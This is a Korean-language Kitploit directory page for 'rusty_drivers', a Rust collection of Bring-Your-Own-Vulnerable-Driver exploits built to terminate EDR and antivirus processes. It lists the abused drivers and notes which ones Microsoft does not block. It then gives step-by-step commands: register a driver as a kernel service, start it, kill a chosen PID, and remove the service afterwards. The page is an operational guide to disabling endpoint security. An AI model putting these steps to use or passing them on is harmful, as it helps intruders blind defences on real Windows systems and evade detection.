Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rusty_drivers — BYOVD collection | Kitploit
도구/GitHubGitHub/florianib/rusty_drivers
ExploitationIDS/IPS EvasionPost-ExploitationRed TeamingAdversarial Attack
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD collection

저장소 보기
2462년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RustyDrivers

이 프로젝트는 EDR/AV 프로세스를 종료하는 데 초점을 맞춘 BYOVD 컬렉션입니다.

현재 다음 드라이버가 지원됩니다:

드라이버인수 이름차단 여부
Process Explorerprocess_explorer예
Genshin Impactgenshin예
Rentdrv2rentdrv2아니요
TrueSighttruesight아니요

차단됨은 해당 드라이버가 Microsoft의 차단 목록에 포함되어 있으며 최신 Windows에서 실행될 수 없다는 의미입니다.

빌드

root@kitploit:~
cargo build --release

사용법

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

예제

실행 파일은 드라이버를 악용하기 위해 서비스를 등록하지 않으므로, 이를 수동으로 수행해야 합니다:

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

그런 다음 서비스를 시작할 수 있습니다:

root@kitploit:~
sc start Test123

마지막으로, Process Explorer 드라이버를 사용하여 PID 1234의 프로세스를 종료하려면 다음 명령어를 사용할 수 있습니다:

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

사용 후 서비스를 정리하는 것을 잊지 마세요:

root@kitploit:~
sc stop Test123
sc delete Test123
도구 다운로드